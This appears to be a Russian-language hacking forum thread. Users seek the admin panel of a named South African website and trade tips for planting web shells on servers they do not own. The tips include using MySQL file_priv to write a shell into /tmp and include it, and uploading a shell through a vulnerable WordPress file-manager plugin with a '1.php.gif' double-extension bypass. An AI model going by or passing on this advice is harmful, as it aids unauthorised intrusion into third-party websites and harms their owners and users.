помогите найти админку www.capetown2007.co.za

DimOnOID нету бажных сайтов тама
Куки не помогают

ап! может кто знает?! ресурсик большой все таки

.
Загрузка шелла-если есть file_priv Y...
чтобы загрузить шелл нужно не только file_priv Y, но и знание пути относительно корня к доступной для записи папке...

diznt посмотри видео журнала "хакер" там может такие случаи были

чтобы загрузить шелл нужно не только file_priv Y, но и знание пути относительно корня к доступной для записи папке...
Есть как минимум одна папка с правами на записть /tmp
заливаешь в нее шелл а потом инклудишь

Всем привет! Я новичёк и мне хотелось бы узнать как пользоваться одной уязвимостью.
Есть такая уязвимость: Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability (https://forum.antichat.ru/showpost.php?p=551246&postcount=21)

Я нашёл сайты, где можно зайти в /ajaxfilemanager/ajaxfilemanager.php, но там файлы с расширением .php всё равно нельзя заливать, и переименовывать расширения тоже нельзя. Скажите пожалуйста, так как всё-таки можно воспользоваться этой уязвимостью, чтобы скинуть на уязвимый сервер желанный shell.php.

Я залил вот таким не хитрым способом (читай общеизвестным) назвал файл (шелл) 1.php.gif залил =) потом скопировал путь до файла, вставил в адресную строку - жамкнул ентер и все ;)